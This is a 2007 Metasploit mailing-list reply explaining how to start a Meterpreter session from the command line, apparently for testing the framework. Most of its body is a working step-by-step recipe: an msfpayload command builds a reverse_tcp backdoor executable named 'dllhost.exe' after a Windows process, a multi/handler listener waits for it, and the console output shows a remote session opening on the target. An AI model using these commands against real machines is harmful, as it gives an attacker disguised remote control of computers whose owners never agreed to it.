[framework] Meterpreter from a command line
mmiller at hick.org
mmiller at hick.org
Tue Feb 27 12:56:35 CST 2007
Chuck,
Client-side support for stdapi has not been implemented in C. However, you
should be able to accomplish what you're asking by using the payload handler
exploit. This will use Metasploit's builtin support for stdapi in ruby, and
makes testing a whole lot easier.
Note: make sure you svn update, a recent change had slightly changed the behavior
of the payload handler which introduced some problems.
Here's how to go about this:
Step 1: Generate the executable that will act as the host for the meterpeter DLL.
This executable hosts the first stage of the payload (the reverse connect):
$ ./msfpayload windows/meterpreter/reverse_tcp LHOST=10.4.79.2 X > dllhost.exe
Created by msfpayload (http://www.metasploit.com).
Payload: windows/meterpreter/reverse_tcp
Length: 177
Options: LHOST=10.4.79.2
Step 2: Start the payload handler
$ ./msfconsole
____________
< metasploit >
------------
\ ,__,
\ (oo)____
(__) )\
||--|| *
=[ msf v3.0-beta-dev
+ -- --=[ 180 exploits - 104 payloads
+ -- --=[ 18 encoders - 5 nops
=[ 31 aux
msf > use multi/handler
msf exploit(handler) > set LHOST 10.4.79.2
LHOST => 10.4.79.2
msf exploit(handler) > exploit
[*] Started reverse handler
[*] Starting the payload handler...
Step 3: Run dllhost.exe on the target computer
After running dllhost.exe, you should see this from msfconsole:
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.4.79.2:4444 -> 10.4.79.102:3031)
meterpreter > idletime
User has been idle for: 8 secs
meterpreter >
Keep in mind that you can use the payload handler from msfcli too.
Hope that helps.
On Tue, Feb 27, 2007 at 01:16:21PM -0500, Chuck Haines wrote:
> Hello all,
> I'm trying to write an example of using the meterpreter from the
> command line. What I want to do is have an exe that start meterpreter
> and connects back to another machine. I have succesfully written the
> code that starts the meterpreter and connects back and it communicates
> just fine. However when I try and load the stdapi, it tells me it
> loads is succesfully, but doesn't actually give me the option of using
> it. Any help with this would be much appreciated. I'm using the
> metcli.exe that comes with the metepreter to listen for a connection
> and custom code to connect back to the metcli.exe and perform the init
> on the metsrv.dll.
> In the previous release (2.7), I had to modify the metcli so it
> knew about the stdapi (well back then fs, net, etc), but it seems that
> the client portion of the stdapi no longer exists and there is only a
> server portion. Is that because it was never written or am I missing
> something? If someone could give a way to use msfconsole and have it
> spawn a meterpreter reverse_tcp without having to do an expoit, that
> would be the best.
>
> Thanks,
> Chuck
>
> --
> Chuck Haines
> chaines at gmail.com
> -----------------------------------------------------------
> Tau Kappa Epsilon Fraternity
> Fraternity For Life Alumni
> http://www.tke.org
> irc://irc.deepspace.org/TKE
> -----------------------------------------------------------
> Deepspace IRC NetAdmin
> Providing Web Services for the Disabled
> http://www.deepspace.org
> irc://irc.deepspace.org/Lobby
> -----------------------------------------------------------
More information about the framework
mailing list